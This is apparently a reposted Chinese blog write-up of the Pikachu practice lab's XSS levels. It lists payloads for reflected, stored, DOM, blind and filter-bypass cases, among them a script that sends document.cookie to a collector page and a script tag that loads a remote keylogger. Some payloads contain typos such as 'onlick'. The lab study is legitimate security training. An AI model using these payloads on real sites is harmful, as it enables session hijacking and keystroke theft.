xss csrf

 反射形

 发现有字数限制,先改为99

 然后输入

 提交后就会弹窗

 查看源码,发现以及写入源码中。

反射形(post)

先构造一个网页模拟提交

然后构造语句<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

 之后就收集到cookies

存储型xss

 先改rk.js文件,然后将其构造为payload

 
<script src="http://192.168.171.129/pikachu/pkxss/rkeypress/rk.js"></script>

然后再次登录,输入sdafffffff

 输入信息后,可以发现信息以及被发送

 查看后台发现输入被记录。

dom型xss

 发现输入变为标签内容,查看源码

根据源码输入payload    ' onclick=alert("xss")> 关闭herf 并同时设为点击弹窗。

 

 dom型xss-s

查看源码,发现将+替换为空格,所以继续构造payload ‘ onlick=alert("aqh")>

 能够正常弹窗

 xss之盲打

查看发现不会有任何内容回显,猜测在后台记录尝试构造payload

 后台查看图像,发现

 攻击成功。

xss之过滤

发现会过滤掉script

重新构造payload <a href="" onlick=alert("aqh")>aqh</a>

 

XSS之htmlspecialchars

发现一些字符会发生转义,但单引号可以正常使用。

所以构造payload ' onclick=alert('aqh') '

 

 发现能够成功攻击。

XSS之href输出

 发现单引号也被过滤,所以尝试js转移。

 

 发现攻击成功。

XSS之js输出

查看源码发现先对输入的内容放入js中进行判断,所以根据这个构造payload '</script><script>alert=('aqh')</script>

猜你喜欢

转载自www.cnblogs.com/P201721410031/p/12035822.html